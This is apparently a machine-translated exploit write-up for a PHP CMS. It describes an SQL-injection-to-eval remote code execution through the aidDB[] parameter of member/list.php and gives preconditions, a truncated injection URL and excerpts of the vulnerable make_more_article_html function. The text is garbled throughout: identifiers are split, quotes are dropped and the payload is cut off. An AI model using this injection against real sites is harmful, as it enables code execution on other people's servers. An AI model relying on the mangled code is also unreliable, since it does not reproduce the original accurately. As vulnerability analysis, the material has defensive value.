By k4shifz [w. s. t]
Bbs.wolvez.org
The search seems to be a problem with the previous vulnerability. It is a little tasteless and requires the following conditions:
1. Website configuration: true or static file generation
2. Allow registered members
The testing code of v6 is provided. After submission, phpinfo () is executed. The v7 principle is the same, but the number of database fields is different.
Member/list. php? Step = 2 & Type = delete & aidDB [] =-1) % 20 union % 20 select %,
0x01 vulnerability in make_more_article_html:
Function make_more_article_html ($ comebackurl =/, $ type =, $ aidDB = ){
Global $ db, $ pre, $ webdb, $ webdb, $ showHtml_Type;
If ($ webdb [NewsMakeHtml]! = 1 | $ aidDB =) // $ webdb [NewsMakeHtml] Static
{Return ;}
...
$ Query = $ db-> query ("select. *, B. bencandy_html, B. list_html, D. aid FROM {$ pre} article_db d left join {$ pre} article a on d. aid =. aid left join {$ pre} sort B ON. fid = B. fid where d. aid IN ($ string )");
While ($ rs = $ db-> fetch_array ($ query )){
...
$ Filename_ B = $ rs [bencandy_html];
...
Eval ("$ showurl =" $ filename_ B ";");
...
0x02 called the vulnerability function in memberlist. php:
If ($ step = 2 ){
...
If ($ Type = delete ){
Make_more_article_html ("$ FROMURL", "del_0", $ aidDB );